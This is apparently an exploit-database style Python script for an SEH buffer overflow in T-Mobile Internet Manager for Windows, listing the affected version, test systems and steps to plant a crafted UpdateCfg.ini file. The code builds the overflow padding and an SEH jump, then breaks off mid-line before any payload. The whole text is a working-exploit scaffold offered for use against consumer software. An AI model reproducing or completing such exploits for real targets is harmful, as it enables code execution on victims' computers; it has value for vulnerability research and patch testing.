#!/usr/bin/python # coding: utf-8 #Exploit Title:T-Mobile Internet Manager SEH Buffer Overflow #Version:Internet Manager Software für Windows (TMO_PCV1.0.5B06) #Software for usb Wireless:T-Mobile web'n'walk Stick Fusion #Homepage:https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html #Software Link:https://www.t-mobile.de/downloads/neu/winui.zip #Found:8.01.2015 #Exploit Author: metacom - twitter.com/m3tac0m #Tested on: Win-7 En, Win-8.1 DE-Enterprise, Win-XPSp3 EN #Video poc:http://bit.ly/17DhwSR print "[*]Copy UpdateCfg.ini to C:\Program Files\T-Mobile\InternetManager_Z\Bin\n" print "[*]Open Program and go to Menu-Options \n" print "[*]Click Update and press Now look for Update\n" from struct import pack junk="\x41" * 18073 nseh="\xeb\x06\x90\x90" seh=pack('